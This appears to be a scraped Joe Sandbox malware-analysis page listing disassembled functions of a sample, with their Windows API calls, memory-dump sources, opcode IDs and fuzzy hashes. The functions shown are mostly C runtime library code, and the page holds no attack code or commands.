                                                                                                                                                                                                                              control_flow_graph 965 7ff7ead1cf60-7ff7ead1cf85 966 7ff7ead1cf8b-7ff7ead1cf8e 965->966 967 7ff7ead1d253 965->967 968 7ff7ead1cfc7-7ff7ead1cff3 966->968 969 7ff7ead1cf90-7ff7ead1cfc2 call 7ff7ead1a814 966->969 970 7ff7ead1d255-7ff7ead1d265 967->970 972 7ff7ead1cffe-7ff7ead1d004 968->972 973 7ff7ead1cff5-7ff7ead1cffc 968->973 969->970 975 7ff7ead1d014-7ff7ead1d029 call 7ff7ead2391c 972->975 976 7ff7ead1d006-7ff7ead1d00f call 7ff7ead1c320 972->976 973->969 973->972 980 7ff7ead1d02f-7ff7ead1d038 975->980 981 7ff7ead1d143-7ff7ead1d14c 975->981 976->975 980->981 984 7ff7ead1d03e-7ff7ead1d042 980->984 982 7ff7ead1d14e-7ff7ead1d154 981->982 983 7ff7ead1d1a0-7ff7ead1d1c5 WriteFile 981->983 987 7ff7ead1d18c-7ff7ead1d19e call 7ff7ead1ca18 982->987 988 7ff7ead1d156-7ff7ead1d159 982->988 985 7ff7ead1d1c7-7ff7ead1d1cd GetLastError 983->985 986 7ff7ead1d1d0 983->986 989 7ff7ead1d044-7ff7ead1d04c call 7ff7ead147c0 984->989 990 7ff7ead1d053-7ff7ead1d05e 984->990 985->986 994 7ff7ead1d1d3 986->994 1009 7ff7ead1d130-7ff7ead1d137 987->1009 995 7ff7ead1d178-7ff7ead1d18a call 7ff7ead1cc38 988->995 996 7ff7ead1d15b-7ff7ead1d15e 988->996 989->990 991 7ff7ead1d060-7ff7ead1d069 990->991 992 7ff7ead1d06f-7ff7ead1d084 GetConsoleMode 990->992 991->981 991->992 1000 7ff7ead1d08a-7ff7ead1d090 992->1000 1001 7ff7ead1d13c 992->1001 1003 7ff7ead1d1d8 994->1003 995->1009 1004 7ff7ead1d1e4-7ff7ead1d1ee 996->1004 1005 7ff7ead1d164-7ff7ead1d176 call 7ff7ead1cb1c 996->1005 1007 7ff7ead1d119-7ff7ead1d12b call 7ff7ead1c5a0 1000->1007 1008 7ff7ead1d096-7ff7ead1d099 1000->1008 1001->981 1010 7ff7ead1d1dd 1003->1010 1011 7ff7ead1d24c-7ff7ead1d251 1004->1011 1012 7ff7ead1d1f0-7ff7ead1d1f5 1004->1012 1005->1009 1007->1009 1015 7ff7ead1d09b-7ff7ead1d09e 1008->1015 1016 7ff7ead1d0a4-7ff7ead1d0b2 1008->1016 1009->1003 1010->1004 1011->970 1017 7ff7ead1d1f7-7ff7ead1d1fa 1012->1017 1018 7ff7ead1d223-7ff7ead1d22d 1012->1018 1015->1010 1015->1016 1022 7ff7ead1d110-7ff7ead1d114 1016->1022 1023 7ff7ead1d0b4 1016->1023 1024 7ff7ead1d1fc-7ff7ead1d20b 1017->1024 1025 7ff7ead1d213-7ff7ead1d21e call 7ff7ead14ec4 1017->1025 1020 7ff7ead1d22f-7ff7ead1d232 1018->1020 1021 7ff7ead1d234-7ff7ead1d243 1018->1021 1020->967 1020->1021 1021->1011 1022->994 1027 7ff7ead1d0b8-7ff7ead1d0cf call 7ff7ead239e8 1023->1027 1024->1025 1025->1018 1031 7ff7ead1d107-7ff7ead1d10d GetLastError 1027->1031 1032 7ff7ead1d0d1-7ff7ead1d0dd 1027->1032 1031->1022 1033 7ff7ead1d0fc-7ff7ead1d103 1032->1033 1034 7ff7ead1d0df-7ff7ead1d0f1 call 7ff7ead239e8 1032->1034 1033->1022 1035 7ff7ead1d105 1033->1035 1034->1031 1038 7ff7ead1d0f3-7ff7ead1d0fa 1034->1038 1035->1027 1038->1033
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D07C
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EAD1CF4B), ref: 00007FF7EAD1D107
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction ID: 2578ef9be3e40082490e357f5b45c89aec39f4200902e0fe636529eaad24ee1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F91C472E1865189F760EF7594403BDABA0FF54B88F9441B6DE8E52688CF3CD482C722
                                                                                                                                                                                                                              Function 00007FF7EAD15628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction ID: d7060ce8004206e8843f8309fcbb555d2b867fba51587e4af50d8cc12d3a0944
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741A462D1878283F710EB709554369B360FBA43A4F908376E6AC03AD9DF7CA4E08761
                                                                                                                                                                                                                              Function 00007FF7EAD0CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: ecca85b24874862a24e7183fb72d5a99607acda9a7379090796502f01be66a86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6313520E0810645FA14FB6594913B9AB82EF9178CFC444B7E94E4B2DFDE7CA805C273
                                                                                                                                                                                                                              Function 00007FF7EAD19A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction ID: 953e1ae474dd10bd08b1e3f9289dba08291ef248b42607fb00a3a233c1deb3fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40D09E20B0870642FB14BB705C552789359EF58B01F9414BAD80B0639BDD7CB94D8332
                                                                                                                                                                                                                              Function 00007FF7EAD1013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction ID: eec38f99bcf9f54e7f1c3a716ea1f693e33258882375edd9fc26d3db17decd87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28510561B0924986F728FA7594007BAE381FF64BA4F8A4772DD6C437DDCE3CE5418622
                                                                                                                                                                                                                              Function 00007FF7EAD1C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: 4c2bb2ce44d08f4f13883e68719424bf672e55fff0495f92f2f6dc96292bc4b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1511EF62A08A9281EA20EB25B800269A761EB51FF0F944372EE7D0B7ECCE7CD4508711
                                                                                                                                                                                                                              Function 00007FF7EAD1A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction ID: 6ddf93305fa28341ec03096d9e730c5371780db105ea9a17e890f3bf8ebbbb0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE086A0F0920243FF15FBF154553789351EF94700FC440B2D81D462A9EE3C68818732
                                                                                                                                                                                                                              Function 00007FF7EAD1AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction ID: d78c9e0a33182bb1b0867914edefaabed07851869f2b579fb04d35b1bfafe9fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5021C661B0C68241FA90F7B195943BD9382DFA4790FC842FBD92E477E9CE7CA4418322
                                                                                                                                                                                                                              Function 00007FF7EAD1BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction ID: c87750b423259ca73a37448cb9e3486c1050400a723d4ed49d439a6e0e6ad29a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41B63291824587FB34EB39A540379F7A1EB65750F900172E68E836D9CF3DE402CBA2
                                                                                                                                                                                                                              Function 00007FF7EAD07F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                              • Instruction ID: 5eac34d143a98ddc1e11c8133e3d16fa8cc1d241fbf1b774b58bcddbc53cc607
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33217121B1865146FA50FA2269443FAE752FF45BD8FC844B2EE4D0778ACEBDE051C712
                                                                                                                                                                                                                              Function 00007FF7EAD1B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction ID: ed6467542f1b89133117b0ef7db505fafeb9c32d2d00e86df438a2cb0da09135
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96317E72A1860285F711FB75884137DA7A0EFA0BA0FC101B7E91D033DADE7CA5428732
                                                                                                                                                                                                                              Function 00007FF7EAD19961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction ID: c9e9575e22fe9a05d56e96a0748133f05442c53471008ec5b0c8fa685a81f891
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B216872A046858AFB24EF74C4803EC73B0EB14718F845677E76D06A99EF389584CB62
                                                                                                                                                                                                                              Function 00007FF7EAD15F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
